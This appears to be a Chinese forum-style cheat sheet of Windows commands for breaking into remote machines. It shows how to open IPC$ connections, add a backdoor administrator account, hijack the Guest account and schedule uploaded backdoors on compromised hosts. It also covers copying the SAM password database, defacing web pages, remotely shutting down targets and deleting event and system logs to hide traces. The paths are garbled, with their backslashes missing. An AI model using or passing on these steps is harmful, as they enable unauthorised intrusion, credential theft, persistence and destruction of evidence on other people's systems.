A、NET命令:

IPC连接:格式 net use 对方IPipc$ "密码" user:"用户名" 『建立IPC连接~』
net use 对方IPipc$ /delete 『断开连接~』
以下操作需要在连接到对方主机后才可进行!!!
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』
net use z:对方IPC$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』

B、AT命令:

查看远程机时间:net time 对方IP
加入一项新任务:
at 对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』

C、TELNET命令:

telnet 对方IP 端口 『作用不用我说了吧???』

D、FTP命令:

登陆:ftp 对方网址(IP地址)
上传文件:get 文件在本机完整路径 对方文件存放完整路径
下载文件:put 对方文件完整路径 本机存放文件路径

E、COPY命令:

在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
⑴copy index.htm 127.0.0.1c$index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下,如果要放到对方的NT目录下,则把C改为admin$』
⑵copy 127.0.0.1adminrepairsam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』

F、SET命令:

主要用于分析目标计算机的基本信息用!具体使用方法请查找相关文件!

G、NBTSTAT命令:

nbtstat -A 对方IP (这个A大写)
『在其中显示前面的英文或数字就是计算机名称!当然,也可以利用PING -A 对方ip的方法来查看对方主机名!效果相同!!!』

H、SHUTDOWN命令:

『用来关闭对方NT服务的命令』格式如下:
shutdown IP地址 t:20
『20秒后自动关闭对方NT服务!由于对对方机器影响较大,慎用!!!』

I、DIR命令:

还用我说么?大家是不是早就该掌握了???(不知道的还是查阅相关资料吧~~~)

J、ECHO命令:

echo coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』

K、ATTRIB命令:

更改文件属性用,格式:
Attrib -r index.htm 『去掉只读属性』(+- 分别代表增加和减少)

L、DEL命令:

『删除日志的时候用!』
del c:winntsystem32logfiles*.*
del c:winntsystem32config*.evt
del c:winntsystem32dtclog*.*
del c:winntsystem32*.log
del c:winntsystem32*.txt
del c:winnt*.txt
del c:winnt*.log

M、PING命令:

-t :ping制定IP,知道网络断开或按CTRL+C结束!
-a :解释PING IP的主机名
-n count :发送count指定的ECHO数据包,默认为4个!